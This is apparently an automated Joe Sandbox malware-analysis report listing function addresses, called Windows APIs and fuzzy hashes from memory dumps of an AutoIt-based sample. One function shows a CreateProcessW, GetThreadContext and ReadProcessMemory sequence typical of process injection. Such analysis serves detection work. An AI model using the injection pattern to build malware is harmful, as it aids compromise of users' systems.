Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59

Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__lock_file.LIBCMT ref: 004253EB

Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34

__fclose_nolock.LIBCMT ref: 004253F6

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E

Function 00408061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD

Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 51f37850cb98198eeba0813d0ef72a7708f98348aba4f21530bc2901e167cef6
Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
Opcode Fuzzy Hash: 51f37850cb98198eeba0813d0ef72a7708f98348aba4f21530bc2901e167cef6
Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679

Function 00B55D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B55D6D

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5aec6409a5d07a72ddf431abffa6da34671ff16b1672739225386697b636eac0
Instruction ID: bc9fbdf9f479fc917398f09daff9dec5b6dec0abbdaa4f047ee840efc4b89ff9
Opcode Fuzzy Hash: 5aec6409a5d07a72ddf431abffa6da34671ff16b1672739225386697b636eac0
Instruction Fuzzy Hash: FBF03663904F10A6DE3E1368997EF712AF0D712717F4D41F6AE41590F28A565C0EC542

Function 00DD7C45 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00DD8403
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DD8499
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DD84BB

Memory Dump Source

Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction ID: 2b66a92efd106b3f9accaef7095550ae88c4a71c77be0c1e644ec490acfb2ad1
Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction Fuzzy Hash: E412CF24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A

Function 00B55F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a2ba8d3432468b4af51353f2bc2a70b03686cec8e695b932a0f1a637f474b1
Instruction ID: 59746a506085f9a8c767ac7a9c60eb165ae32953a07f1a256ff4f0a5640944f7
Opcode Fuzzy Hash: 67a2ba8d3432468b4af51353f2bc2a70b03686cec8e695b932a0f1a637f474b1
Instruction Fuzzy Hash: C871E43180DF808EC736462888B5775BBF0EB66323F8D46DADC958B1E2D2719D4D8792

Function 0040F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c29cfb24ce68e9de0a3e4653d5cdaeed7e1c02807bea28096c5e890268b1a6
Instruction ID: 2d49773f75dd6c9e76722b9e08c524f4cf74b12b855309a226cff4a1f54d4b31
Opcode Fuzzy Hash: 98c29cfb24ce68e9de0a3e4653d5cdaeed7e1c02807bea28096c5e890268b1a6
Instruction Fuzzy Hash: 7D619B706002069FDB20DF60C881AABB7E5EF44314F14847EED06A7782D779ED59CB59

Function 00411FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 655149723a526a119eba7f333844dbfa5ebcbda2c28a3769f0cc5d9cc4bc4e9a
Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
Opcode Fuzzy Hash: 655149723a526a119eba7f333844dbfa5ebcbda2c28a3769f0cc5d9cc4bc4e9a
Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49

Function 0040750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004075EA

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9b66ca3a1bf3ca386ab96623059038914a149c0a3e5575ad7caa120d5a025636
Instruction ID: 703fb4e51e7414ef2a0eeb7bc43b43b7e3b383bd1c29d48b3ed1298fc8db5a6e
Opcode Fuzzy Hash: 9b66ca3a1bf3ca386ab96623059038914a149c0a3e5575ad7caa120d5a025636
Instruction Fuzzy Hash: FD319279A08612AFC714DF19D490A62F7E0FF09310B54C57EE98A9B791D734E841CB8A

Function 00B56490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2dc08c644dc6ca05cc6c2326d728d4a46702471d9b997669307385dad58c7a
Instruction ID: 3f99a29264c13c6edec6b7e36e59b75667cb61dc56e1963e755915435a82c8d0
Opcode Fuzzy Hash: 7f2dc08c644dc6ca05cc6c2326d728d4a46702471d9b997669307385dad58c7a
Instruction Fuzzy Hash: 0731AA6190C7409ACB358B28C498739BBF0EBA1753FCC86DADD859B2E2D6758C0CD752

Function 00405AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95

Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00420CB7

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89

Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043FCB7

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
Opcode Fuzzy Hash: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A

Function 004059B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00405A01

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f3a8ba66783d9f2ca771444c789aedbf2dca50b5bbb514ea790e640098e8d90e
Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
Opcode Fuzzy Hash: f3a8ba66783d9f2ca771444c789aedbf2dca50b5bbb514ea790e640098e8d90e
Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E

Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF

Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4

Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99

Function 00407F77 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407FA9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 23aa5d6730224e7b4161d594b5eb1c95187ee6def08ffadbe1a1e65e6f887bd2
Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
Opcode Fuzzy Hash: 23aa5d6730224e7b4161d594b5eb1c95187ee6def08ffadbe1a1e65e6f887bd2
Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55

Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0043FD91

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
Opcode Fuzzy Hash: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B

Function 00405BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64

Function 00405A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0043DD18

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5a02a00512f46877ea8946ec1b9fc00a7595a857a6becba086734166165304c3
Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
Opcode Fuzzy Hash: 5a02a00512f46877ea8946ec1b9fc00a7595a857a6becba086734166165304c3
Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4

Function 00B56086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00B5608C

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: df774b81d38fe665cf5983e2870c673d55002798de476a7d083b4bdff743f218
Instruction ID: c8aa675d6e6404deb7208196b3c7c9b180f52614a9741afe76955938a5085f89
Opcode Fuzzy Hash: df774b81d38fe665cf5983e2870c673d55002798de476a7d083b4bdff743f218
Instruction Fuzzy Hash: 1601846180D7409EC7358B2484547357BF4EB56313F4D96DAAD85AB1E2D6708D0CC752

Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 004248A6

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
